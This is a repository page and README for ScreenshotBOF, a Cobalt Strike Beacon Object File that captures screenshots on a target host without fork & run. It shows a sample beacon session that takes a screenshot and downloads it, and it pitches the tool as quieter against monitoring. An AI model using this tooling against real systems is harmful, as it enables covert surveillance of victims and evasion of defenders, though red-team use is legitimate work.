| ScreenshotBOF | Loading last commit info... | |
| bin/BOF | ||
| .gitignore | ||
| README.md | ||
| ScreenshotBOF.sln |
README.md
ScreenshotBOF
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
Usage
- import the screenshotBOF.cna script into Cobalt Strike
- use the command screenshot_bof
- Download the screenshot from the target
beacon> screenshot_bof
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 3411 bytes
[+] received output:
[*] Tasked beacon to printscreen and save to disk
[+] received output:
[+] PrintScreen saved to bitmap...
[+] received output:
[+] Printscreen bitmap saved to screenshot.bmp
beacon> download screenshot.bmp
[*] Tasked beacon to download screenshot.bmp
[+] host called home, sent: 22 bytes
[*] started download of C:\screenshot.bmp (12441668 bytes)
[*] download of screenshot.bmp is complete
Notes
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
- in memory downloading of screenshots is planned to be added
- the filename can be changed in the source code.
Why did I make this?
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.